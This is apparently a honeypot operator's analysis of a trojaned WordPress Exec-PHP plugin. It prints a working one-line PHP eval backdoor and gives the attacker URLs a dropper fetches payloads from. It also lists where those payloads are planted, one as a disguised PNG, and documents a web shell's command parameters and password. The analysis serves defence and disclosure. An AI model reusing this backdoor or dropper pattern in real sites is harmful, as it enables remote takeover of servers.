A plugin with trojans:
- simple one-liner backdoor
- Chinese language web shell
- Kaylin Chinese language web shell
Apparently, an Exec-PHP plugin exists, but has been removed from Worpress.com's official list of plugins because it hasn't been updated since 2009.
That reconciles with this exec-php github repository. It appears that one of the original Exec-PHP's big contributors put the code on Github in 2009. The github repo's latest release is Exec-PHP 4.9, the same version sported by the kinked plugin documented here.
The kinked Zip file contains two files that don't appear identically in the exec-php githup repository. These two files have Zip file dates much later than every other file in the downloade Zip file:
1851 2017-11-03 14:46 exec-php/wall.php
2376 2016-11-07 12:18 exec-php/login_wall.php
The file exec-php/login_wall.php has contents related to other login_wall.php files.
These two files are the kink in the Exec-PHP plugin.
A couple of hours later, the same IP address tried to get wall.php and login_wall.php
installed on my WordPress honey pot with a different plugin, "contact-form-7",
which is also a real plugin, albeit under active development.
It's a Digital Ocean address. Not much to be learned there.
inetnum: 95.85.32.0 - 95.85.39.255
netname: DIGITALOCEAN-AMS-4
descr: Digital Ocean, Inc.
country: NL
created: 2013-11-23T02:11:35Z
last-modified: 2015-11-20T14:44:10Z
Downloaded to my honey pot as if the attackers had invoked a real WordPress site's
upload plugin URL (/wordpress/wp-admin/plugin-install.php?tab=upload).
As such, the attackers sent a Zip file with the
The two malicious files in the plugin-download-Zip-file aren't terribly obfuscated.
login_wall.php has no obfuscation at all.
I analyize similar files named login_wall.php in another section.
There's some code in here that claims to be a plugin named "Login Wall". Such a plugin exists, but the only common thing between the real plugin and this malicious code are a few comments.
It also has a simple backdor:
if($_GET["login"]=="cmd"){if($_POST['123']==''){echo('->|OK|-<');exit();}eval($_POST['123']);exit();}
If you do an HTTP POST method request, with a URL ending in ?login=cmd,
the backdoor looks at a POST parameter named "123".
If parameter "123" has no value, the code replies "->|OK|-<",
essentially a simple test of the backdoor.
If parameter "123" has a non-zero-length value, the backdor tries to eval that value as PHP source code.
This is a dropper of sorts.
wall.php, when executed, tries to download 3 files from somewhere on the web:
http://ga-google.com/Nic/wu/bob.txt
http://ga-google.com/Nic/wu/emb.txt
http://ga-google.com/Nic/wu/plugin.txt
If everything in wall.php works correctly, these 3 files end up in 5 files:
bob.txt→/wp-admin/user/editor.phpplugin.txt→/wp-admin/includes/plugin-editor.phpbob.txt→/wp-includes/pomo/editor.phpemb.txt→/wp-includes/embes.phpbob.txt→/wp-includes/images/require.png
~/src/php/reverse-php-malware/revphp plugin.txt > d2.php. This basically concatenates and decodes strings in the source code, simple deobfuscating chores.- Edit
d2.php, change "eval" to "print" php d2.php > d3.php- Pretty print:
~/src/php/reverse-php-malware/pp.php d3.php > f3.php
cp bob.txt a3.php; edita3.phpto include "<?php", change "eval" to "print"php a3.php > a4.php~/src/php/reverse-php-malware/pp.php a4.php > a5.php
emb.txt has no obfuscation.
It consists of comments and only a single executable line of code:
include("../wp-includes/images/require.png");
Wait, wall.php tried to create a file named like that.
Executing emb.txt (by HTTP invocation of /wp-includes/embes.php)
will cause the execution of bob.txt code, named as a PNG image file.
Classic local file inclusion, used as misdirection instead of an exploit.
plugin.txt, invoked via URL ending in /wp-admin/includes/plugin-editor.php,
implements a minimalistic web shell.
Execution is password-protected. Password is in plaintext in the code, "c5cd946631fa902a901c243055339788".
Password sent to plugin.txt via HTTP POST parameter named "pass".
It specifies the GB 2312 simplified Chinese character set in the HTTP headers of its response.
HTTP Parameters
| Name | Value | Purpose |
|---|---|---|
| p | rename | rename file, name in "file" parameter |
| p | delete | delete file or directory, name in "file" parameter |
| p | chmod | change permissions of file or directory, name in "file" parameter, permissions in "chvalue" |
| p | modFMT | change last access time of file named in "file" parameter, time in "time" |
| p | cmd | execute a shell command on server |
| p | eval | eval PHP code on server, from "eval" parameter |
| p | editfile | edit file , name in "file" parameter, via <textarea> in HTML form |
| q | downfile | Send file from server, name in parameter "file", to user via HTTP |
| q | upfile | HTTP file upload to server, to directory named by parameter dir |
| q | createdir | Create directory with name from crdir parameter on server |
| dir | change to this directory on server | |
| eval | PHP source to run on server | |
| file | send URL-encoded bytes | |
| filenew | rename a file to this name | |
| chvalue | send permissions, rwxrwxrwx octal-style | |
| crdir | send a directory name | |
| time | send a timestamp | |
| ef | Choice of what PHP builtin to execute a shell command | |
| cmd | send shell command to server |
The code reads like some of these parameters are usually called directly by another program, all the "q" sub-commands, and some of the "p" subcommands. Other "p" subcommands ("editfile", "rename", "delete") cause the code to generate humand readable HTML for a response.
If the "p" parameter is unset, or has a zero-length-string value, the code generates HTML appropriate for Dreaded Chinese Hackers to use to manage files.
After wall.php runs, the contents of bob.txt can be invoked
remotely via 3 different URLs, since emb.txt merely includes bob.txt
As it happens, bob.txt contains an unmodified copy of kaylin file manager,
which my honey pot has caught in the past.
whois says this:
Domain Name:ga-google.com
Registry Domain ID:1965912374_domain_com-vrsn
Registrar WHOIS Server:whois.paycenter.com.cn
Registrar URL:http://www.xinnet.com
Updated Date:2018-10-06T00:37:45.00Z
Creation Date:2015-10-04T08:25:02.00Z
Registrar Registration Expiration Date:2019-10-04T08:25:02.00Z
Registrar:XINNET TECHNOLOGY CORPORATION
Registrar IANA ID:120
Registrar Abuse Contact Email:[email protected]
Registrar Abuse Contact Phone:+86.1087128064
Xinnet Technology Corporation has very odd information available. Bloomberg research says this:
Xin Net Technology Corp. is based in Beijing, China. Xin Net Technology Corp. operates as a subsidiary of Global Peopleline Telecom, Inc.
The same Bloomberg research says that Global Peopleline Telecom, Inc. went out of business in 2011.
Xin Net Tech has a Beijing, China address, while Global Peopleline Telecom has a Vancouver, Canada address. I smell a rat.
ga-google.com has IP address 209.141.58.97,
and whois says this about 209.141.58.97:
NetRange: 209.141.32.0 - 209.141.63.255
CIDR: 209.141.32.0/19
NetName: PONYNET-04
NetHandle: NET-209-141-32-0-1
Parent: NET209 (NET-209-0-0-0-0)
NetType: Direct Allocation
OriginAS: AS53667
Organization: FranTech Solutions (SYNDI-5)
RegDate: 2011-01-27
Updated: 2012-03-25
Ref: https://rdap.arin.net/registry/ip/209.141.32.0
FranTech Solutions appears to be a low-cost VPS vendor.
A Chinese company with no official officers operating as a subsidiary of a Canadian company that's gone out of business rents its servers from a VPS vendor who "humbly ask that you try out our alternative brand, BuyVM". Sounds totally sane and totally legal to me.